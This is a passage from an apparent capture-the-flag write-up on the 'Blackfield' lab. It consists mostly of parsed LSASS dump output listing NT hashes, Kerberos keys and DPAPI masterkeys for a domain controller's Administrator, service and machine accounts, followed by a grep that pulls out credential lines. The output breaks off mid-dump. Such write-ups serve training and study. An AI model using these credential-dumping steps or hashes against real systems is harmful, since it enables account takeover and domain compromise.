260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               AES128 Key: b624dc83a27cc29da11d9bf25efea796 -               AES256 Key: eee13fce940cce15b93edd7b2506c9d5a8fec62fc13c8fa3723c3da603960c44 -       == WDIGEST [593b5]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) - -== LogonSession == -authentication_id 257142 (3ec76) -session_id 0 -username DC01$ -domainname BLACKFIELD -logon_server   -logon_time 2020-02-23T17:59:13.318909+00:00 -sid S-1-5-18 -luid 257142 -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.LOCAL - -== LogonSession == -authentication_id 153705 (25869) -session_id 1 -username Administrator -domainname BLACKFIELD -logon_server DC01 -logon_time 2020-02-23T17:59:04.506080+00:00 -sid S-1-5-21-4194615774-2175524697-3563712290-500 -luid 153705 -       == MSV == -               Username: Administrator -               Domain: BLACKFIELD -               LM: NA -               NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 -               SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368 -               DPAPI: 240339f898b6ac4ce3f34702e4a8955000000000 -       == WDIGEST [25869]== -               username Administrator -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: Administrator -               Domain: BLACKFIELD.LOCAL -               AES128 Key: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 -               AES256 Key: ec841e1e29ad7d6332a243b6b4ab445839829244408269850ab7c78a2cf45615 -       == WDIGEST [25869]== -               username Administrator -               domainname BLACKFIELD -               password None -               password (hex) -       == DPAPI [25869]== -               luid 153705 -               key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e -               masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5 -               sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9 - -== LogonSession == -authentication_id 137110 (21796) -session_id 0 -username DC01$ -domainname BLACKFIELD -logon_server   -logon_time 2020-02-23T17:58:27.068590+00:00 -sid S-1-5-18 -luid 137110 -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.LOCAL - -== LogonSession == -authentication_id 134695 (20e27) -session_id 0 -username DC01$ -domainname BLACKFIELD -logon_server   -logon_time 2020-02-23T17:58:26.678019+00:00 -sid S-1-5-18 -luid 134695 -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.LOCAL - -== LogonSession == -authentication_id 40310 (9d76) -session_id 1 -username DWM-1 -domainname Window Manager -logon_server   -logon_time 2020-02-23T17:57:46.897202+00:00 -sid S-1-5-90-0-1 -luid 40310 -       == MSV == -               Username: DC01$ -               Domain: BLACKFIELD -               LM: NA -               NT: b624dc83a27cc29da11d9bf25efea796 -               SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d -               DPAPI: 0000000000000000000000000000000000000000 -       == WDIGEST [9d76]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.local -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               AES128 Key: b624dc83a27cc29da11d9bf25efea796 -               AES256 Key: eee13fce940cce15b93edd7b2506c9d5a8fec62fc13c8fa3723c3da603960c44 -       == WDIGEST [9d76]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) - -== LogonSession == -authentication_id 40232 (9d28) -session_id 1 -username DWM-1 -domainname Window Manager -logon_server   -logon_time 2020-02-23T17:57:46.897202+00:00 -sid S-1-5-90-0-1 -luid 40232 -       == MSV == -               Username: DC01$ -               Domain: BLACKFIELD -               LM: NA -               NT: b624dc83a27cc29da11d9bf25efea796 -               SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d -               DPAPI: 0000000000000000000000000000000000000000 -       == WDIGEST [9d28]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.local -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               AES128 Key: b624dc83a27cc29da11d9bf25efea796 -               AES256 Key: eee13fce940cce15b93edd7b2506c9d5a8fec62fc13c8fa3723c3da603960c44 -       == WDIGEST [9d28]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) - -== LogonSession == -authentication_id 996 (3e4) -session_id 0 -username DC01$ -domainname BLACKFIELD -logon_server   -logon_time 2020-02-23T17:57:46.725846+00:00 -sid S-1-5-20 -luid 996 -       == MSV == -               Username: DC01$ -               Domain: BLACKFIELD -               LM: NA -               NT: b624dc83a27cc29da11d9bf25efea796 -               SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d -               DPAPI: 0000000000000000000000000000000000000000 -       == WDIGEST [3e4]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: dc01$ -               Domain: BLACKFIELD.local -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               AES128 Key: b624dc83a27cc29da11d9bf25efea796 -               AES256 Key: ae7032a985fe7303c182f82d15df15b1ccf731c7f33947e3bd2f193d12d9d684 -       == WDIGEST [3e4]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) - -== LogonSession == -authentication_id 24410 (5f5a) -session_id 1 -username UMFD-1 -domainname Font Driver Host -logon_server   -logon_time 2020-02-23T17:57:46.569111+00:00 -sid S-1-5-96-0-1 -luid 24410 -       == MSV == -               Username: DC01$ -               Domain: BLACKFIELD -               LM: NA -               NT: b624dc83a27cc29da11d9bf25efea796 -               SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d -               DPAPI: 0000000000000000000000000000000000000000 -       == WDIGEST [5f5a]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.local -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               AES128 Key: b624dc83a27cc29da11d9bf25efea796 -               AES256 Key: eee13fce940cce15b93edd7b2506c9d5a8fec62fc13c8fa3723c3da603960c44 -       == WDIGEST [5f5a]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) - -== LogonSession == -authentication_id 406499 (633e3) -session_id 2 -username svc_backup -domainname BLACKFIELD -logon_server DC01 -logon_time 2020-02-23T18:00:03.423728+00:00 -sid S-1-5-21-4194615774-2175524697-3563712290-1413 -luid 406499 -       == MSV == -               Username: svc_backup -               Domain: BLACKFIELD -               LM: NA -               NT: 9658d1d1dcd9250115e2205d9f48400d -               SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c -               DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000 -       == WDIGEST [633e3]== -               username svc_backup -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: svc_backup -               Domain: BLACKFIELD.LOCAL -               AES128 Key: 9658d1d1dcd9250115e2205d9f48400d -               AES256 Key: 20a3e879a3a0ca4f51db1e63514a27ac18eef553d8f30c29805c398c97599e91 -       == WDIGEST [633e3]== -               username svc_backup -               domainname BLACKFIELD -               password None -               password (hex) -       == DPAPI [633e3]== -               luid 406499 -               key_guid 836e8326-d136-4b9f-94c7-3353c4e45770 -               masterkey 0ab34d5f8cb6ae5ec44a4cb49ff60c8afdf0b465deb9436eebc2fcb1999d5841496c3ffe892b0a6fed6742b1e13a5aab322b6ea50effab71514f3dbeac025bdf -               sha1_masterkey 6efc8aa0abb1f2c19e101fbd9bebfb0979c4a991 - -== LogonSession == -authentication_id 366665 (59849) -session_id 2 -username DWM-2 -domainname Window Manager -logon_server   -logon_time 2020-02-23T17:59:38.293877+00:00 -sid S-1-5-90-0-2 -luid 366665 -       == MSV == -               Username: DC01$ -               Domain: BLACKFIELD -               LM: NA -               NT: b624dc83a27cc29da11d9bf25efea796 -               SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d -               DPAPI: 0000000000000000000000000000000000000000 -       == WDIGEST [59849]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.local -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               AES128 Key: b624dc83a27cc29da11d9bf25efea796 -               AES256 Key: eee13fce940cce15b93edd7b2506c9d5a8fec62fc13c8fa3723c3da603960c44 -       == WDIGEST [59849]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) - -== LogonSession == -authentication_id 366649 (59839) -session_id 2 -username DWM-2 -domainname Window Manager -logon_server   -logon_time 2020-02-23T17:59:38.293877+00:00 -sid S-1-5-90-0-2 -luid 366649 -       == MSV == -               Username: DC01$ -               Domain: BLACKFIELD -               LM: NA -               NT: b624dc83a27cc29da11d9bf25efea796 -               SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d -               DPAPI: 0000000000000000000000000000000000000000 -       == WDIGEST [59839]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.local -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               AES128 Key: b624dc83a27cc29da11d9bf25efea796 -               AES256 Key: eee13fce940cce15b93edd7b2506c9d5a8fec62fc13c8fa3723c3da603960c44 -       == WDIGEST [59839]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) - -== LogonSession == -authentication_id 256940 (3ebac) -session_id 0 -username DC01$ -domainname BLACKFIELD -logon_server   -logon_time 2020-02-23T17:59:13.068835+00:00 -sid S-1-5-18 -luid 256940 -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.LOCAL - -== LogonSession == -authentication_id 136764 (2163c) -session_id 0 -username DC01$ -domainname BLACKFIELD -logon_server   -logon_time 2020-02-23T17:58:27.052945+00:00 -sid S-1-5-18 -luid 136764 -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.LOCAL - -== LogonSession == -authentication_id 134935 (20f17) -session_id 0 -username DC01$ -domainname BLACKFIELD -logon_server   -logon_time 2020-02-23T17:58:26.834285+00:00 -sid S-1-5-18 -luid 134935 -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.LOCAL - -== LogonSession == -authentication_id 997 (3e5) -session_id 0 -username LOCAL SERVICE -domainname NT AUTHORITY -logon_server   -logon_time 2020-02-23T17:57:47.162285+00:00 -sid S-1-5-19 -luid 997 -       == Kerberos == -               Username:   -               Domain:   - -== LogonSession == -authentication_id 24405 (5f55) -session_id 0 -username UMFD-0 -domainname Font Driver Host -logon_server   -logon_time 2020-02-23T17:57:46.569111+00:00 -sid S-1-5-96-0-0 -luid 24405 -       == MSV == -               Username: DC01$ -               Domain: BLACKFIELD -               LM: NA -               NT: b624dc83a27cc29da11d9bf25efea796 -               SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d -               DPAPI: 0000000000000000000000000000000000000000 -       == WDIGEST [5f55]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.local -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               AES128 Key: b624dc83a27cc29da11d9bf25efea796 -               AES256 Key: eee13fce940cce15b93edd7b2506c9d5a8fec62fc13c8fa3723c3da603960c44 -       == WDIGEST [5f55]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) - -== LogonSession == -authentication_id 24294 (5ee6) -session_id 0 -username UMFD-0 -domainname Font Driver Host -logon_server   -logon_time 2020-02-23T17:57:46.554117+00:00 -sid S-1-5-96-0-0 -luid 24294 -       == MSV == -               Username: DC01$ -               Domain: BLACKFIELD -               LM: NA -               NT: b624dc83a27cc29da11d9bf25efea796 -               SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d -               DPAPI: 0000000000000000000000000000000000000000 -       == WDIGEST [5ee6]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.local -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               AES128 Key: b624dc83a27cc29da11d9bf25efea796 -               AES256 Key: eee13fce940cce15b93edd7b2506c9d5a8fec62fc13c8fa3723c3da603960c44 -       == WDIGEST [5ee6]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) - -== LogonSession == -authentication_id 24282 (5eda) -session_id 1 -username UMFD-1 -domainname Font Driver Host -logon_server   -logon_time 2020-02-23T17:57:46.554117+00:00 -sid S-1-5-96-0-1 -luid 24282 -       == MSV == -               Username: DC01$ -               Domain: BLACKFIELD -               LM: NA -               NT: b624dc83a27cc29da11d9bf25efea796 -               SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d -               DPAPI: 0000000000000000000000000000000000000000 -       == WDIGEST [5eda]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: DC01$ -               Domain: BLACKFIELD.local -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               AES128 Key: b624dc83a27cc29da11d9bf25efea796 -               AES256 Key: eee13fce940cce15b93edd7b2506c9d5a8fec62fc13c8fa3723c3da603960c44 -       == WDIGEST [5eda]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) - -== LogonSession == -authentication_id 22028 (560c) -session_id 0 -username   -domainname   -logon_server   -logon_time 2020-02-23T17:57:44.959593+00:00 -sid None -luid 22028 -       == MSV == -               Username: DC01$ -               Domain: BLACKFIELD -               LM: NA -               NT: b624dc83a27cc29da11d9bf25efea796 -               SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d -               DPAPI: 0000000000000000000000000000000000000000 - -== LogonSession == -authentication_id 999 (3e7) -session_id 0 -username DC01$ -domainname BLACKFIELD -logon_server   -logon_time 2020-02-23T17:57:44.913221+00:00 -sid S-1-5-18 -luid 999 -       == WDIGEST [3e7]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) -       == Kerberos == -               Username: dc01$ -               Domain: BLACKFIELD.LOCAL -               AES128 Key: b624dc83a27cc29da11d9bf25efea796 -               AES256 Key: ae7032a985fe7303c182f82d15df15b1ccf731c7f33947e3bd2f193d12d9d684 -       == WDIGEST [3e7]== -               username DC01$ -               domainname BLACKFIELD -               password None -               password (hex) -       == DPAPI [3e7]== -               luid 999 -               key_guid 0f7e926c-c502-4cad-90fa-32b78425b5a9 -               masterkey ebbb538876be341ae33e88640e4e1d16c16ad5363c15b0709d3a97e34980ad5085436181f66fa3a0ec122d461676475b24be001736f920cd21637fee13dfc616 -               sha1_masterkey ed834662c755c50ef7285d88a4015f9c5d6499cd -       == DPAPI [3e7]== -               luid 999 -               key_guid f611f8d0-9510-4a8a-94d7-5054cc85a654 -               masterkey 7c874d2a50ea2c4024bd5b24eef4515088cf3fe21f3b9cafd3c81af02fd5ca742015117e7f2675e781ce7775fcde2740ae7207526ce493bdc89d2ae3eb0e02e9 -               sha1_masterkey cf1c0b79da85f6c84b96fd7a0a5d7a5265594477 -       == DPAPI [3e7]== -               luid 999 -               key_guid 31632c55-7a7c-4c51-9065-65469950e94e -               masterkey 825063c43b0ea082e2d3ddf6006a8dcced269f2d34fe4367259a0907d29139b58822349e687c7ea0258633e5b109678e8e2337d76d4e38e390d8b980fb737edb -               sha1_masterkey 6f3e0e7bf68f9a7df07549903888ea87f015bb01 -       == DPAPI [3e7]== -               luid 999 -               key_guid 7e0da320-072c-4b4a-969f-62087d9f9870 -               masterkey 1fe8f550be4948f213e0591eef9d876364246ea108da6dd2af73ff455485a56101067fbc669e99ad9e858f75ae9bd7e8a6b2096407c4541e2b44e67e4e21d8f5 -               sha1_masterkey f50955e8b8a7c921fdf9bac7b9a2483a9ac3ceed -``` - -we'll `printf` all of that into `lsass_parse.txt`. - -```bash ->  grep -iE 'user|username|password|pass|hash' lsass_parse.txt -username svc_backup -               Username: svc_backup -               username svc_backup -               password None -               password (hex) -               Username: svc_backup -               username svc_backup -               password None -               password (hex) -username UMFD-2 -               Username: DC01$ -               username DC01$ -               password None -               password (hex) -               Username: DC01$ -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               username DC01$ -               password None -               password (hex) -username UMFD-2 -               Username: DC01$ -               username DC01$ -               password None -               password (hex) -               Username: DC01$ -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               username DC01$ -               password None -               password (hex) -username DC01$ -               Username: DC01$ -username Administrator -               Username: Administrator -               username Administrator -               password None -               password (hex) -               Username: Administrator -               username Administrator -               password None -               password (hex) -username DC01$ -               Username: DC01$ -username DC01$ -               Username: DC01$ -username DWM-1 -               Username: DC01$ -               username DC01$ -               password None -               password (hex) -               Username: DC01$ -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               username DC01$ -               password None -               password (hex) -username DWM-1 -               Username: DC01$ -               username DC01$ -               password None -               password (hex) -               Username: DC01$ -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               username DC01$ -               password None -               password (hex) -username DC01$ -               Username: DC01$ -               username DC01$ -               password None -               password (hex) -               Username: dc01$ -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               username DC01$ -               password None -               password (hex) -username UMFD-1 -               Username: DC01$ -               username DC01$ -               password None -               password (hex) -               Username: DC01$ -               Password: 260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d004800 -3a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a0028 -00620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d00 -48003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a -002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 -               username DC01$ -               password None -               password (hex) -username svc_backup -               Username: svc_backup -               username svc_backup -               password None -               password (hex) -               Username: svc_backup -               username svc_backup -               password None -               password (hex) -username DWM-2 -               Username: DC01$ -               username DC01$ -               password None -               password (hex) -               Username: DC01$ -               Password: 